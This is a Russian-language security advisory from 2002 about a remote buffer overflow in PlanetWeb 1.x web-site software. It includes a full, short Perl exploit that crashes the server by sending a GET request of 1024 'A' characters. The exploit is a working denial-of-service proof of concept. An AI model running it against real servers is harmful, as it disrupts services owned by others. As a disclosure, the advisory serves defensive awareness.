Переполнение буфера в PlanetWeb

Дата публикации:
18.09.2002
Всего просмотров:
767
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PlanetWeb 1.x
Описание: PlanetWeb – коммерческий пакет программ, позволяющий создавать Web сайт непосредственно на вашем компьютере.

GET запрос, содержащий более 1024 символов, приведет к аварийному заверщению работы программы. Уязвимость может использоваться для выполнения произвольного кода.

Эксплоит:

#!/usr/bin/perl
# PlanetWeb Software perl exploit
# by UkR-XblP / UkR security team
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 vulnurable_server 
..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                  PeerAddr  => $host,
                                  PeerPort  => "http(80)",
                                  );
unless ($remote) { die "cannot connect to http daemon on 
$host" }
$xblp = "A" x 1024;
$exploit = "GET /".$xblp." HTTP/1.0\n\n";
$remote->autoflush(1);
print $remote $exploit;
close $remote;
Уязвимость обнаружена в PlanetWeb Software v1.14

Ссылки: Planet Web Software Buffer Overflow
или введите имя

CAPTCHA